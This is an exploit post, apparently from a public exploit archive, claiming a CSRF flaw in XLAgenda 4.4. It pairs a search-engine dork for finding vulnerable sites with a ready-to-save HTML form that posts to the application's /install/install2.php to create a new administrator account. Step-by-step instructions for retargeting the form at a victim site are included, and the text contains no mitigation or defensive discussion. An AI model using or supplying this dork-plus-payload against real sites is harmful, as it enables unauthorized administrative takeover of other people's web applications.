====================================================================================================================================
| # Title     : XLAgenda v4.4 CSRF Vulnerability                                                                                   |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | 
| # Vendor    : https://xavier.lequere.net/xlagenda/                                                                               |  
| # Dork      : "Propulsé par XLAgenda 4.4"                                                                                        |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin.

[+] Go to the line 12.

[+] Set the target site link Save changes and apply. 

[+] infected file : /install/install2.php.

[+] http://127.0.0.1/xlagenda44/install/install2.php

[+] save code as poc.html .

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>XLAgenda 4.4 | Installation</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex, nofollow" />
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<h1>Installation - Etape 2/3</h1>
<p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p>
<form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">
	<h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>
	<p>
		<label for="user">Nom d'utilisateur :</label><br>
		<input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>
		(20 caractères maximum)
	</p>
	<p>
		<label for="pass">Mot de passe :</label><br>
		<input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>
		(6 à 15 caractères)
	</p>
	<p>
		<label for="pass2">Introduisez à nouveau le mot de passe :</label><br>
		<input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *
	</p>
	<p>
		<label for="nom">Nom :</label><br>
		<input name="nom" type="text" id="nom" value="" size="30" />
	</p>
	<p>
		<label for="prenom">Prénom :</label><br> 
		<input name="prenom" type="text" id="prenom" value="" size="30" />
	</p>
	<p>
		<label for="email">Adresse email :</label><br>
		<input name="email" type="text" id="email" value="" size="30" /> *
	</p>
	<p>
		Les champs marqués d'un * sont obligatoires.<br>
		Votre adresse email n'appara&icirc;tra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.
	</p>
	<p style="text-align:center;"> 
	<input type="submit" name="Submit" value="Continuer >>" />
	</p>
</form></body>
</html>


Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================